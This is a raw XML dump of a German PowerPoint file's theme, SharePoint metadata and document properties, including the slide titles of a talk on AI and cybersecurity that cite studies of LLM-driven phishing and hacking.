      <a:folHlink>
        <a:srgbClr val="333333"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="A1 Serif A1 Sans">
      <a:majorFont>
        <a:latin typeface="A1 Serif"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="A1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a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
  <a:extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="A1Digital.potx" id="{A464EF32-0C43-4F2B-BBD0-542EC2FE2AB3}" vid="{AD616F7C-CCD6-4105-AEF3-8720D90CFBB0}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office">
  <a:themeElements>
    <a:clrScheme name="A1 Digital">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="333333"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F2F2F2"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="DA291C"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="6295AC"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="BCBCBC"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="999999"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="666666"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="F2F2F2"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="333333"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="333333"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="A1 Serif A1 Sans">
      <a:majorFont>
        <a:latin typeface="A1 Serif"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="A1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A1 Digital">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="333333"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F2F2F2"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="DA291C"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="6295AC"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="BCBCBC"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="999999"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="666666"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="F2F2F2"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="333333"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="333333"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="A1 Serif A1 Sans">
      <a:majorFont>
        <a:latin typeface="A1 Serif"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="A1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7439a59-0ea7-4bc6-b685-2df6e3d743e9">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="9abe4625-b961-45e4-9e78-4635cd839441" xsi:nil="true"/>
    <SharedWithUsers xmlns="9abe4625-b961-45e4-9e78-4635cd839441">
      <UserInfo>
        <DisplayName>Katona Attila</DisplayName>
        <AccountId>67</AccountId>
        <AccountType/>
      </UserInfo>
    </SharedWithUsers>
    <_Flow_SignoffStatus xmlns="47439a59-0ea7-4bc6-b685-2df6e3d743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088442C3DDA84883AD3056A8A4B828" ma:contentTypeVersion="17" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="bd6857537028dcc2693fe5346a18ed08">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="47439a59-0ea7-4bc6-b685-2df6e3d743e9" xmlns:ns3="9abe4625-b961-45e4-9e78-4635cd839441" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1c3ba7e78381707e4811dfdaa3d91711" ns2:_="" ns3:_="">
    <xsd:import namespace="47439a59-0ea7-4bc6-b685-2df6e3d743e9"/>
    <xsd:import namespace="9abe4625-b961-45e4-9e78-4635cd8394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439a59-0ea7-4bc6-b685-2df6e3d743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_Flow_SignoffStatus" ma:index="18" nillable="true" ma:displayName="Status Unterschrift" ma:internalName="Status_x0020_Unterschrift">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c12d65e-8050-4921-ae4d-015f658aa0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be4625-b961-45e4-9e78-4635cd83944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d7cafd5-70a0-4ac0-8e1e-14df2668f2fd}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="9abe4625-b961-45e4-9e78-4635cd8394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A5034E-6C8A-4429-AF12-593CE5427539}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E2674428-8ADD-4782-9BB0-93AB36D27162}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="5849e920-0835-4fc6-94a0-15141ee1dd2f"/>
    <ds:schemaRef ds:uri="42a8c4c4-9180-4a29-ad42-2d0866a8ce00"/>
    <ds:schemaRef ds:uri="47439a59-0ea7-4bc6-b685-2df6e3d743e9"/>
    <ds:schemaRef ds:uri="9abe4625-b961-45e4-9e78-4635cd839441"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1A4A129E-03B2-44AB-BCA0-435552DE7F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439a59-0ea7-4bc6-b685-2df6e3d743e9"/>
    <ds:schemaRef ds:uri="9abe4625-b961-45e4-9e78-4635cd8394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A1Digital</Template>
  <TotalTime>0</TotalTime>
  <Words>964</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Breitbild</PresentationFormat>
  <Paragraphs>156</Paragraphs>
  <Slides>33</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33</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="40" baseType="lpstr">
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Cascadia Code</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>A1 Sans</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>A1 Serif</vt:lpstr>
      <vt:lpstr>A1Digital</vt:lpstr>
      <vt:lpstr>AI und Cybersicherheit</vt:lpstr>
      <vt:lpstr>Manuel Reinsperger</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Wird AI ein sicherheitsrelevantes Problem? </vt:lpstr>
      <vt:lpstr>    Ist AI ein sicherheitsrelevantes Problem? </vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>In 5 Jahren wird sich Cybersicherheit grundlegend geändert haben</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Evaluating Large Language Models’ Capability to Launch Fully Automated Spear Phishing Campaigns: Validated on Human Subjects</vt:lpstr>
      <vt:lpstr>Evaluating Large Language Models’ Capability to Launch Fully Automated Spear Phishing Campaigns: Validated on Human Subjects</vt:lpstr>
      <vt:lpstr>Evaluating Large Language Models’ Capability to Launch Fully Automated Spear Phishing Campaigns: Validated on Human Subjects</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>82.6% der Phishing Mails nutzten 2025 KI</vt:lpstr>
      <vt:lpstr>Technische Angriffe</vt:lpstr>
      <vt:lpstr>HackingBuddyGPT</vt:lpstr>
      <vt:lpstr>Can LLMs Hack Enterprise Networks? (Happe, 2025)</vt:lpstr>
      <vt:lpstr>Can LLMs Hack Enterprise Networks? (Happe, 2025)</vt:lpstr>
      <vt:lpstr>Dangerous Capability Evaluation of LLMs for Web Penetration Testing (Reinsperger, 2025Q3)</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>On the Feasibility of Using LLMs to execute Multistage Network Attacks (Singer et al., 2025)</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>- OpenAI (09.10.2024)</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>„You are a Pentester and have been authorized to test …“</vt:lpstr>
      <vt:lpstr>LLM-Hack Agent Honeypot (Reworr,Dmitrii, 2025)</vt:lpstr>
      <vt:lpstr>Bis 2028 wird sich Cybersicherheit grundlegend geändert haben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A1Digital</dc:title>
  <dc:creator>Peter Claus Lamprecht</dc:creator>
  <cp:lastModifiedBy>Reinsperger Manuel</cp:lastModifiedBy>
  <cp:revision>93</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-28T10:04:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-12T23:38:15Z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0x01010015088442C3DDA84883AD3056A8A4B828</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>